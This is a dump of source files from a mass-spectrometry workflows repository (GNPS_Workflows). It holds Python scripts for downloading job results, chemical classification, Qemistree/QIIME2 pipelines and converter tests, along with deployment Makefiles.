\"qiime2_metadata.tsv\")\n quantification_filename = os.path.join(args.output_folder, \"quantification.tsv\")\n \n #Pull down the qiime2 data\n with open(manifest_filename, 'wb') as f:\n f.write(requests.get(manifest_url).content)\n\n with open(metadata_filename, 'wb') as f:\n f.write(requests.get(metadata_url).content)\n\n with open(quantification_filename, 'wb') as f:\n f.write(requests.get(quantification_url).content)\n\n #Rewriting the quantification file format\n bucket_table_df = pd.read_csv(quantification_filename, sep = ',')\n bucket_table_df.columns = bucket_table_df.columns.str.replace(' Peak area','')\n bucket_table_df.columns = bucket_table_df.columns.str.replace('.mzXML','')\n bucket_table_df.columns = bucket_table_df.columns.str.replace('.mzML','')\n bucket_table_df.columns = bucket_table_df.columns.str.replace('.mgf','')\n bucket_table_df = bucket_table_df.drop(['row m/z', 'row number of detected peaks', 'row retention time'], axis=1)\n bucket_table_df = bucket_table_df.rename(columns = {'row ID':'#OTU ID'})\n\n cols = [c for c in bucket_table_df.columns if not(\"Unnamed: \" in c)]\n bucket_table_df = bucket_table_df[cols]\n\n bucket_table_df.to_csv(quantification_filename, sep=\"\\t\", index=False)\n\n \n metabodist_endpoint = SERVER_BASE + \"/processmetabodisttree\"\n\n files = {'manifest': open(manifest_filename, 'r'), \\\n 'metadata': open(metadata_filename, 'r'), \\\n 'quantification': open(quantification_filename, 'r'), \\\n 'classyfireresult': open(classyfire_result_filename, 'r')}\n\n r_post = requests.post(metabodist_endpoint, files=files)\n response_dict = r_post.json()\n \n with open(os.path.join(args.output_folder, \"metabodistree_table.qza\"), 'wb') as f:\n r = requests.get(SERVER_BASE + response_dict[\"table_qza\"], stream=True)\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n\n with open(os.path.join(args.output_folder, \"metabodistree_emperor.qzv\"), 'wb') as f:\n r = requests.get(SERVER_BASE + response_dict[\"emperor_qzv\"], stream=True)\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n\n except KeyboardInterrupt:\n raise\n except:\n print(\"Error\")\n exit(0)\n " }, { "alpha_fraction": 0.6955307126045227, "alphanum_fraction": 0.7112430334091187, "avg_line_length": 47.54237365722656, "blob_id": "12f73306a816ca2ed247fc024bfac614d570bb5c", "content_id": "b8cedf0d4d33f3f97d882bf8c75843027c6e62cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2864, "license_type": "no_license", "max_line_length": 182, 
"num_lines": 59, "path": "/feature-based-molecular-networking/test/test_converters.py", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "import unittest\nimport sys\nimport filecmp\nsys.path.insert(0, \"../tools/feature-based-molecular-networking/scripts/\")\nimport msdial_formatter\nimport progenesis_formatter\nimport metaboscape_formatter\nimport xcms_formatter\nimport mzmine2_formatter\nimport openms_formatter\n\nclass TestLoaders(unittest.TestCase):\n\n def test_msdial(self):\n msdial_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/MS-DIAL/MS-DIAL-GNPS_AG_test_featuretable.txt\", \\\n \"./msdial_output.csv\")\n\n self.assertTrue(filecmp.cmp(\"./msdial_output.csv\", \"./reference_input_file_for_formatter/MS-DIAL/MS-DIAL-GNPS_AG_test_featuretable_reference_output_file.csv\", shallow=False))\n\n def test_msdial_ims(self):\n msdial_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/MS-DIAL/GnpsTable_1_20198191357_PASEF.txt\", \\\n \"./msdial_ims_output.csv\")\n\n self.assertTrue(filecmp.cmp(\"./msdial_ims_output.csv\", \"./reference_input_file_for_formatter/MS-DIAL/GnpsTable_1_20198191357_PASEF_output.csv\", shallow=False))\n\n def test_progenesis(self):\n compound_to_scan_mapping = progenesis_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/Progensis_MSE/SONAR_20_Yeast_Peaks.csv\", \\\n \"./progenesis_output.csv\")\n\n progenesis_formatter.convert_mgf(\"./reference_input_file_for_formatter/Progensis_MSE/SONAR_20_Yeast_MSMS.msp\", \"progenesis_output.mgf\", compound_to_scan_mapping)\n\n compound_to_scan_mapping = progenesis_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/Progensis_MSE/Neg_MSE_Catechin.csv\", \\\n \"./progenesis_output_catechin.csv\")\n\n progenesis_formatter.convert_mgf(\"./reference_input_file_for_formatter/Progensis_MSE/Neg_MSE_Catechin.msp\", \"progenesis_output_catechin.mgf\", compound_to_scan_mapping)\n\n def test_metaboscape(self):\n metaboscape_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/MetaboScape/Lipids.msmsonly.csv\", \\\n \"./metaboscape_output.csv\")\n\n def test_mzmine2(self):\n mzmine2_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/mzmine2/MZmine-GNPS_AG_test_featuretable.csv\", \\\n \"./mzmine_output.csv\")\n\n def test_openms(self):\n openms_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/openms/textexporter-00000.csv\", \\\n \"./openms_output.csv\")\n\n def test_xcms3(self):\n xcms_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/xcms3/XCMS3-GNPS_AG_test_featuretable.txt\", \\\n \"./xcms3_output.csv\")\n\n def test_xcms3_iin(self):\n xcms_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/xcms3/camera_iin_quant_table_sub.txt\", \\\n \"./xcms3_output_iin.csv\")\n\n\nif __name__ == '__main__':\n unittest.main()\n" }, { "alpha_fraction": 0.6293237209320068, "alphanum_fraction": 0.6427465081214905, "avg_line_length": 26.28169059753418, "blob_id": "9d8826b36d14c0c685dd9f7a35c8158a7c4df1d2", "content_id": "1bfb2a830c3e631cb6ad67542b1b30d222b2afd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1937, "license_type": "no_license", "max_line_length": 106, "num_lines": 71, "path": "/qemistree/tools/qemistree/fingerprint_network.py", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport sys\nimport getopt\nimport 
os\nimport pandas as pd\nimport argparse\nimport glob\n\ndef similarity(fingerprint_dict1, fingerprint_dict2):\n    dict1_fingerprints = set([key for key in fingerprint_dict1 if fingerprint_dict1[key] > 0.5])\n    dict2_fingerprints = set([key for key in fingerprint_dict2 if fingerprint_dict2[key] > 0.5])\n\n    intersection = dict1_fingerprints & dict2_fingerprints\n    union = dict1_fingerprints | dict2_fingerprints\n\n    jaccard_index = float(len(intersection))/float(len(union))\n\n    return jaccard_index\n\ndef main():\n    parser = argparse.ArgumentParser(description='Compute pairwise fingerprint similarities')\n    parser.add_argument(\"fingerprint_summary_folder\")\n    parser.add_argument(\"output_folder\")\n\n    args = parser.parse_args()\n    input_filename = os.path.join(args.fingerprint_summary_folder, \"summary_fingerprints.tsv\")\n    df = pd.read_csv(input_filename, sep=\"\\t\")\n\n    all_records = df.to_dict(orient=\"records\")\n    all_records_reformatted = []\n\n    for record in all_records:\n        new_dict = {}\n        new_dict[\"feature_id\"] = record[\"feature_id\"]\n        record.pop(\"feature_id\")\n        new_dict[\"fingerprint_scores\"] = record\n        all_records_reformatted.append(new_dict)\n\n    output_list = []\n    for record1 in all_records_reformatted:\n        for record2 in all_records_reformatted:\n            if int(record1[\"feature_id\"]) <= int(record2[\"feature_id\"]):\n                continue\n\n            output_dict = {}\n            output_dict[\"SCAN1\"] = record1[\"feature_id\"]\n            output_dict[\"SCAN2\"] = record2[\"feature_id\"]\n\n            sim = similarity(record1[\"fingerprint_scores\"], record2[\"fingerprint_scores\"])\n\n            output_dict[\"sim\"] = sim\n\n            output_list.append(output_dict)\n\n    pd.DataFrame(output_list).to_csv(os.path.join(args.output_folder, \"pairs.tsv\"), sep=\"\\t\", index=False)\n\n\nif __name__ == \"__main__\":\n    main()\n" }, { "alpha_fraction": 0.6477294564247131, "alphanum_fraction": 0.6517874598503113, "avg_line_length": 44.394737243652344, "blob_id": "d94b5d0aeb76dfcdbd6b4987627c144e9d6c32c7", "content_id": "16bf10231bab484a641eb70af1f58feed10ebdaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5175, "license_type": "no_license", "max_line_length": 247, "num_lines": 114, "path": "/qemistree/tools/qemistree/qemistree.py", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport sys\nimport getopt\nimport os\nimport pandas as pd\nimport argparse\n\ndef main():\n    parser = argparse.ArgumentParser(description='Run the Qemistree pipeline')\n    parser.add_argument(\"input_sirius_mgf\")\n    parser.add_argument(\"input_quant_table\")\n    parser.add_argument(\"input_metadata_table\")\n    parser.add_argument(\"output_folder\")\n    parser.add_argument(\"conda_activate_bin\")\n    parser.add_argument(\"conda_environment\")\n    parser.add_argument(\"sirius_bin\")\n\n    args = parser.parse_args()\n\n    output_feature_qza = os.path.join(args.output_folder, \"feature-table.qza\")\n    output_mgf_qza = os.path.join(args.output_folder, \"sirius.mgf.qza\")\n    output_fragtree_qza = os.path.join(args.output_folder, \"fragmentation_trees.qza\")\n    output_formula_qza = os.path.join(args.output_folder, \"formula.qza\")\n    output_fingerprints_qza = os.path.join(args.output_folder, \"fingerprints.qza\")\n    output_qemistree_qza = os.path.join(args.output_folder, \"qemistree.qza\")\n    output_merged_feature_table_qza = os.path.join(args.output_folder, \"merged_feature_table.qza\")\n    output_merged_data_qza = os.path.join(args.output_folder, \"merged_data.qza\")\n    output_distance_matrix_qza = 
os.path.join(args.output_folder, \"distance_matrix.qza\")\n output_pcoa_qza = os.path.join(args.output_folder, \"pcoa.qza\")\n output_emperor_qza = os.path.join(args.output_folder, \"emperor.qzv\")\n\n all_cmd = []\n\n if \".biom\" in args.input_quant_table:\n cmd = \"source {} {} && LC_ALL=en_US && export LC_ALL && qiime tools import --input-path {} --output-path {} --type FeatureTable[Frequency]\".format(args.conda_activate_bin, args.conda_environment, args.input_quant_table, output_feature_qza)\n all_cmd.append(cmd)\n elif \".qza\" in args.input_quant_table:\n cmd = \"cp {} {}\".format(args.input_quant_table, output_feature_qza)\n all_cmd.append(cmd)\n elif \".csv\" in args.input_quant_table:\n print(\"TODO: Will handle mzmine2 input, would recommend using FMBN first\")\n exit(1)\n\n cmd = \"source {} {} && LC_ALL=en_US && export LC_ALL && qiime tools import --input-path {} --output-path {} --type MassSpectrometryFeatures\".format(args.conda_activate_bin, args.conda_environment, args.input_sirius_mgf, output_mgf_qza)\n all_cmd.append(cmd)\n\n cmd = 'source {} {} && LC_ALL=en_US && export LC_ALL && qiime qemistree compute-fragmentation-trees --p-sirius-path {} \\\n --i-features {} \\\n --p-ppm-max 15 \\\n --p-profile orbitrap \\\n --p-ionization-mode positive \\\n --p-java-flags \"-Djava.io.tmpdir=./temp -Xms16G -Xmx64G\" \\\n --o-fragmentation-trees {}'.format(args.conda_activate_bin, args.conda_environment, args.sirius_bin, output_mgf_qza, output_fragtree_qza)\n all_cmd.append(cmd)\n\n cmd = 'source {} {} && LC_ALL=en_US && export LC_ALL && qiime qemistree rerank-molecular-formulas --p-sirius-path {} \\\n --i-features {} \\\n --i-fragmentation-trees {} \\\n --p-zodiac-threshold 0.95 \\\n --p-java-flags \"-Djava.io.tmpdir=./temp -Xms16G -Xmx64G\" \\\n --o-molecular-formulas {}'.format(args.conda_activate_bin, args.conda_environment, args.sirius_bin, output_mgf_qza, output_fragtree_qza, output_formula_qza)\n all_cmd.append(cmd)\n\n cmd = 'source {} {} && LC_ALL=en_US && export LC_ALL && qiime qemistree predict-fingerprints --p-sirius-path {} \\\n --i-molecular-formulas {} \\\n --p-ppm-max 20 \\\n --p-java-flags \"-Djava.io.tmpdir=./temp -Xms16G -Xmx64G\" \\\n --o-predicted-fingerprints {}'.format(args.conda_activate_bin, args.conda_environment, args.sirius_bin, output_formula_qza, output_fingerprints_qza)\n all_cmd.append(cmd)\n\n cmd = 'source {} {} && LC_ALL=en_US && export LC_ALL && qiime qemistree make-hierarchy \\\n --i-csi-results {} \\\n --i-feature-tables {} \\\n --o-tree {} \\\n --o-merged-feature-table {} \\\n --o-merged-feature-data {}'.format(args.conda_activate_bin, args.conda_environment, \\\n output_fingerprints_qza, \\\n output_feature_qza, \\\n output_qemistree_qza, \\\n output_merged_feature_table_qza, \\\n output_merged_data_qza)\n all_cmd.append(cmd)\n\n cmd = 'source {} {} && LC_ALL=en_US && export LC_ALL && qiime diversity beta-phylogenetic \\\n --i-phylogeny {} \\\n --p-metric \"weighted_unifrac\" \\\n --o-distance-matrix {}'.format(args.conda_activate_bin, args.conda_environment, \\\n output_merged_data_qza, \\\n output_distance_matrix_qza)\n all_cmd.append(cmd)\n\n cmd = 'source {} {} && LC_ALL=en_US && export LC_ALL && qiime diversity pcoa \\\n --i-distance-matrix {} \\\n --o-pcoa {}'.format(args.conda_activate_bin, args.conda_environment, \\\n output_distance_matrix_qza, \\\n output_pcoa_qza)\n all_cmd.append(cmd)\n\n cmd = 'source {} {} && LC_ALL=en_US && export LC_ALL && qiime emperor plot \\\n --i-pcoa {} \\\n --m-metadata-file {} \\\n 
--p-ignore-missing-samples \\\n --o-visualization {}'.format(args.conda_activate_bin, args.conda_environment, \\\n output_pcoa_qza, \\\n args.input_metadata_table, \\\n output_emperor_qza)\n all_cmd.append(cmd)\n\n for cmd in all_cmd:\n print(cmd)\n os.system(cmd)\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.8169934749603271, "alphanum_fraction": 0.8300653696060181, "avg_line_length": 24.5, "blob_id": "02df68251ddfdfedd44a31d6c64a8ede34b4d7a7", "content_id": "891c48a3c74261ee0128273b4548a8ae2a497a93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 153, "license_type": "no_license", "max_line_length": 34, "num_lines": 6, "path": "/msms-chooser/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=msms-chooser\nTOOL_FOLDER_NAME=msms-chooser\nWORKFLOW_VERSION=release_14\n" }, { "alpha_fraction": 0.8231292366981506, "alphanum_fraction": 0.8367347121238708, "avg_line_length": 23.5, "blob_id": "9bae3b7cd9289ae5cf051e0b2c7cb9ff242822a5", "content_id": "a7a2bbfcbbbd4bafde0c4cf2e4ad6375f8abe66b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 147, "license_type": "no_license", "max_line_length": 34, "num_lines": 6, "path": "/qemistree/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=qemistree\nTOOL_FOLDER_NAME=qemistree\nWORKFLOW_VERSION=release_14\n" }, { "alpha_fraction": 0.6807028651237488, "alphanum_fraction": 0.6842378973960876, "avg_line_length": 44.15962600708008, "blob_id": "754617f7d7c00248285b0073aa13ced02990a594", "content_id": "c0f7d12a4be2f977eb0d1b098fe88cc13ab94583", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9618, "license_type": "no_license", "max_line_length": 187, "num_lines": 213, "path": "/molnetenhancer/tools/molnetenhancer/chemClass2Network.py", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "from pyMolNetEnhancer import *\nimport pandas as pd\nimport os\nimport csv \nimport json\nimport networkx as nx\nfrom pathlib import Path\n\ninfer_numeric_types = True\n\ndef create_Folder(directory='Output Files'):\n try:\n if not os.path.exists(directory):\n os.makedirs(directory)\n except OSError:\n print ('Error: Creating directory. 
' + directory)\n    #return directory\n\n#download the GNPS result archive for the user-defined GNPS job ID\ndef request_GNPS_file(GNPS_job_ID, directory):\n    import requests\n    from io import BytesIO\n    from zipfile import ZipFile\n\n    result = requests.post(\"https://gnps.ucsd.edu/ProteoSAFe/DownloadResult?task=%s&view=download_cytoscape_data\" % GNPS_job_ID)\n    print('GNPS request success: ' + str(result.ok))\n    zf = ZipFile(BytesIO(result.content))\n    folder_name = directory + '/GNPS_output_graphML'\n    zf.extractall(folder_name)\n    zf.close()\n    return folder_name #returns the folder name of the GNPS_output_graphML folder (str)\n\n#download the Varquest result archive for the user-defined Varquest job ID\ndef request_Varquest_file(Varquest_job_ID, directory):\n    import requests\n    from io import BytesIO\n    from zipfile import ZipFile\n\n    result = requests.post(\"https://gnps.ucsd.edu/ProteoSAFe/DownloadResult?task=%s&view=view_significant\" % Varquest_job_ID)\n    print('Varquest request success: ' + str(result.ok))\n    zf = ZipFile(BytesIO(result.content))\n    folder_name = directory + '/Varquest_output'\n    zf.extractall(folder_name)\n    zf.close()\n    return folder_name #returns the folder name of the Varquest_output folder (str)\n\n#download the Dereplicator result archive for the user-defined Dereplicator job ID\ndef request_Derep_file(Derep_job_ID, directory):\n    import requests\n    from io import BytesIO\n    from zipfile import ZipFile\n\n    result = requests.post(\"https://gnps.ucsd.edu/ProteoSAFe/DownloadResult?task=%s&view=view_significant\" % Derep_job_ID)\n    print('Dereplicator request success: ' + str(result.ok))\n    zf = ZipFile(BytesIO(result.content))\n    folder_name = directory + '/Derep_output'\n    zf.extractall(folder_name)\n    zf.close()\n    return folder_name #returns the folder name of the Derep_output folder (str)\n\n#process GNPS file\ndef process_GNPS_file(GNPS_file):\n    if 'clusterinfo_summary' in os.listdir(GNPS_file) and 'DB_result' in os.listdir(GNPS_file):\n        netfile = GNPS_file + 'clusterinfo_summary/' + str(os.listdir(GNPS_file + 'clusterinfo_summary/')[0])\n        gnpslibfile = GNPS_file + 'DB_result/'+ str(os.listdir(GNPS_file + 'DB_result/')[0])\n\n    elif 'clusterinfosummarygroup_attributes_withIDs_withcomponentID' in os.listdir(GNPS_file):\n        netfile = GNPS_file + 'clusterinfosummarygroup_attributes_withIDs_withcomponentID/' + str(os.listdir(GNPS_file + 'clusterinfosummarygroup_attributes_withIDs_withcomponentID/')[0])\n        gnpslibfile = GNPS_file + 'result_specnets_DB/'+ str(os.listdir(GNPS_file + 'result_specnets_DB/')[0])\n\n    else:\n        netfile = GNPS_file + 'clusterinfosummary/' + str(os.listdir(GNPS_file + 'clusterinfosummary/')[0])\n        gnpslibfile = GNPS_file + 'result_specnets_DB/'+ str(os.listdir(GNPS_file + 'result_specnets_DB/')[0])\n    return gnpslibfile, netfile\n\n#add all chemical structural information outputs as dataframe items in a list\ndef add_Chemical_Info(gnpslibfile, directory, nap_ID=None, Derep_job_ID=None, Varquest_job_ID=None, derepfile=None, varquestfile=None):\n\n    gnpslib = pd.read_csv(gnpslibfile, sep='\\t')\n    matches = [gnpslib]\n\n    if nap_ID != None and nap_ID != 'None':\n        nap = pd.read_csv(\"http://proteomics2.ucsd.edu/ProteoSAFe/DownloadResultFile?task=%s&block=main&file=final_out/node_attributes_table.tsv\" % nap_ID, sep = \"\\t\")\n        matches.append(nap)\n    elif nap_ID == None or nap_ID == 'None':\n        nap = None\n\n    if Derep_job_ID != None and Derep_job_ID != 'None':\n        derep = pd.read_csv(derepfile 
+ [s for s in os.listdir(derepfile) if \"DEREPLICATOR\" in s][0], sep = '\\t')\n        matches.append(derep)\n    elif Derep_job_ID == None or Derep_job_ID == 'None':\n        derep = None\n\n    if Varquest_job_ID != None and Varquest_job_ID != 'None':\n        varquest = pd.read_csv(varquestfile + [s for s in os.listdir(varquestfile) if \"DEREPLICATOR\" in s][0], sep = '\\t')\n        matches.append(varquest)\n    elif Varquest_job_ID == None or Varquest_job_ID == 'None':\n        varquest = None\n\n    file_name = directory + '/SMILES.csv'\n    out = unique_smiles(matches)\n    out['df'].to_csv(file_name, quoting=csv.QUOTE_NONE, escapechar='&')\n    print('SMILES have been written to \"'+file_name+'\"')\n    return file_name, out #returns the file name of the SMILES.csv (str)\n\n#convert SMILES to InchiKeys\ndef convert_SMILES_InchiKeys(SMILES_csv, out, directory):\n    import requests\n    from bs4 import BeautifulSoup\n    from lxml import html\n\n    smiles_df = pd.read_csv(SMILES_csv)\n\n    InchiKeys_lst = []\n    SMILES_failed = []\n    fail_count = 0\n\n    for i in range(len(smiles_df)):\n        smile_str = smiles_df.loc[i]['SMILES']\n        link = 'https://gnps-structure.ucsd.edu/inchikey?smiles=%s' % smile_str\n        result = requests.get(link)\n        soup = str(BeautifulSoup(result.content, 'html.parser'))\n\n        if '<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">' in soup:\n            SMILES_failed.append(smile_str)\n            fail_count += 1\n            InchiKeys_lst.append('InChIKey=XXXXXXXXXXXXXX-XXXXXXXXXX-X') # placeholder for unidentified\n        else:\n            InchiKeys_lst.append('InChIKey=' + soup)\n    print('Number of failed conversions is ' + str(fail_count))\n\n    ikeys = pd.DataFrame(data=InchiKeys_lst)\n    ikeys.columns = ['InChIKey']\n    file_name = directory + '/InchiKeys.txt'\n    ikeys.to_csv(file_name, quoting=csv.QUOTE_NONE, escapechar='&')\n\n    out['df']['inchikey'] = ikeys\n    inchi_dic = make_inchidic(out)\n\n    print('conversions have been written to \"'+file_name+'\"')\n    return out, file_name, inchi_dic, SMILES_failed #returns dictionary, inchi_dic and list of failed\n\ndef get_Classy(InchiKeys, directory):\n    get_classifications(InchiKeys)\n    new_path = directory + '/all_json.json'\n    os.rename('all_json.json', new_path)\n    print('classifications have been written to all_json.json')\n\ndef create_ClassyFireResults(netfile, inchi_dic, directory):\n    with open(directory + \"/all_json.json\") as tweetfile:\n        jsondic = json.loads(tweetfile.read())\n\n    df = make_classy_table(jsondic)\n    df = df.rename(columns = {'class':'CF_class','smiles':'SMILES'})\n    net = pd.read_csv(netfile, sep='\\t')\n    final = molfam_classes(net,df,inchi_dic)\n\n    #Set score columns with no matches to 0\n    for key in final:\n        if \"_score\" in key:\n            final[key] = final[key].map({\"\" : 0.0}, na_action=\"ignore\")\n\n    file_name = directory + \"/ClassyFireResults_Network.txt\"\n    final.to_csv(file_name, sep = '\\t', index = False)\n    print('created \"'+file_name+'\"')\n    return final, file_name\n\ndef create_GraphML(GNPS_file, final, directory):\n    if any(\"FEATURE\" in s for s in os.listdir(GNPS_file)):\n        graphMLfile = GNPS_file + [x for x in os.listdir(GNPS_file) if 'FEATURE' in x][0]\n        graphML = nx.read_graphml(graphMLfile)\n        graphML_classy = make_classyfire_graphml(graphML,final)\n        nx.write_graphml(graphML_classy, directory+\"/ClassyFireResults_Network.graphml\", infer_numeric_types = infer_numeric_types)\n        print('graphML has been written to ClassyFireResults_Network.graphml')\n    elif any(\"METABOLOMICS\" in s for s in os.listdir(GNPS_file)):\n        graphMLfile = GNPS_file + [x for x in os.listdir(GNPS_file) if 'METABOLOMICS' in x][0]\n        graphML = nx.read_graphml(graphMLfile)\n        graphML_classy = make_classyfire_graphml(graphML,final)\n        nx.write_graphml(graphML_classy, directory+\"/ClassyFireResults_Network.graphml\", infer_numeric_types = infer_numeric_types)\n        print('graphML has been written to ClassyFireResults_Network.graphml')\n    else:\n        print('There is no graphML file for this GNPS molecular network job')\n\ndef pack_User_Params(prob, overlap, top):\n    user_Params = [prob, overlap, top]\n    return user_Params\n\ndef unpack_User_Params(user_Params):\n    prob = user_Params[0]\n    overlap = user_Params[1]\n    top = user_Params[2]\n    return prob, overlap, top\n\ndef mass_2_Motifs(GNPS_file, MS2LDA_job_ID, ClassyFireResults_file, directory, user_Params):\n    #import MS2LDA data\n    motifs = pd.read_csv('http://ms2lda.org/basicviz/get_gnps_summary/%s' % MS2LDA_job_ID)\n    edges = pd.read_csv(GNPS_file + 'networkedges_selfloop/' + str(os.listdir(GNPS_file +'networkedges_selfloop/')[0]), sep = '\\t')\n    #unpack user parameters\n    prob, overlap, top = unpack_User_Params(user_Params)\n    #create network data with mapped motifs\n    motif_network = Mass2Motif_2_Network(edges, motifs, prob, overlap, top)\n    motif_network['edges'].to_csv('Mass2Motifs_Edges.tsv', sep='\\t',index=False)\n    motif_network['nodes'].to_csv('Mass2Motifs_Nodes.tsv', sep='\\t',index=True)\n    #create graphML file\n    MG = make_motif_graphml(motif_network['nodes'],motif_network['edges'])\n    #write graphML file\n    nx.write_graphml(MG, os.path.join(directory, \"Motif_Network.graphml\"), infer_numeric_types = infer_numeric_types)\n    final = pd.read_csv(ClassyFireResults_file, sep = \"\\t\")\n    graphML_classy = make_classyfire_graphml(MG, final)\n    nx.write_graphml(graphML_classy, os.path.join(directory, \"Motif_ChemicalClass_Network.graphml\"), infer_numeric_types = infer_numeric_types)\n    print('Mass 2 Motifs graphML has been written to Motif_ChemicalClass_Network.graphml')" }, { "alpha_fraction": 0.801369845867157, "alphanum_fraction": 0.8150684833526611, "avg_line_length": 23.16666603088379, "blob_id": "9690998e8fd414c2a30dc32f87660633b366b947", "content_id": "2f71af4d7d3d7a6ccd64afbd780fb1f23f5bdf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 146, "license_type": "no_license", "max_line_length": 34, "num_lines": 6, "path": "/mshub-gc/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=mshub-gc\nTOOL_FOLDER_NAME=mshub-gc\nWORKFLOW_VERSION=release_14\n\n" }, { "alpha_fraction": 0.8372092843055725, "alphanum_fraction": 0.8488371968269348, "avg_line_length": 27.83333396911621, "blob_id": "c775c51d07076524532413aeee5c5ef0088ff196", "content_id": "70c3362dbfc8da55e0af98cc605dc07e39812c72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 172, "license_type": "no_license", "max_line_length": 40, "num_lines": 6, "path": "/molecular-librarysearch-gc/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=molecular-librarysearch-gc\nTOOL_FOLDER_NAME=molecularsearch-gc\nWORKFLOW_VERSION=release_14" }, { "alpha_fraction": 0.8037974834442139, "alphanum_fraction": 0.8291139006614685, "avg_line_length": 25.16666603088379, "blob_id": "52ca3f7fb9929e487924fc0e8a116e47018fd28c", "content_id": "03dc8bc0b8b37b6f41ca7a016584ebd54b48ee51", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Makefile", "length_bytes": 158, "license_type": "no_license", "max_line_length": 34, "num_lines": 6, "path": "/ms2lda_motifdb/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=ms2lda_motifdb\nTOOL_FOLDER_NAME=ms2lda_motifdb\nWORKFLOW_VERSION=release_12\n\n" }, { "alpha_fraction": 0.8165680766105652, "alphanum_fraction": 0.8402366638183594, "avg_line_length": 27, "blob_id": "97c0b7a2b28f7454525dcf0e1bfa8781f1e93a8e", "content_id": "254d2d0c3624854d413f86525ed0237135595466", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 169, "license_type": "no_license", "max_line_length": 35, "num_lines": 6, "path": "/metabolomics-snets-v2/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=metabolomics-snets-v2\nTOOL_FOLDER_NAME=metabolomicsnetsv2\nWORKFLOW_VERSION=release_14\n\n" }, { "alpha_fraction": 0.8291139006614685, "alphanum_fraction": 0.8417721390724182, "avg_line_length": 25.16666603088379, "blob_id": "1755dfb8e5f17b26a540292b6ab0c56045ff8416", "content_id": "1bf173b6f76ec0f123da14c21218a34d6fe02ebd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 158, "license_type": "no_license", "max_line_length": 34, "num_lines": 6, "path": "/molnetenhancer/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=molnetenhancer\nTOOL_FOLDER_NAME=molnetenhancer\nWORKFLOW_VERSION=release_13\n\n" }, { "alpha_fraction": 0.6227223873138428, "alphanum_fraction": 0.6304930448532104, "avg_line_length": 49.41891860961914, "blob_id": "4cc0e93c230df044898103d7a74920e4e37e04a7", "content_id": "60ea3317f73466e6c93a29af42995ebe7a669320", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3732, "license_type": "no_license", "max_line_length": 187, "num_lines": 74, "path": "/feature-based-molecular-networking/tools/feature-based-molecular-networking/scripts/xcms_formatter.py", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 9 14:47:58 2018. 
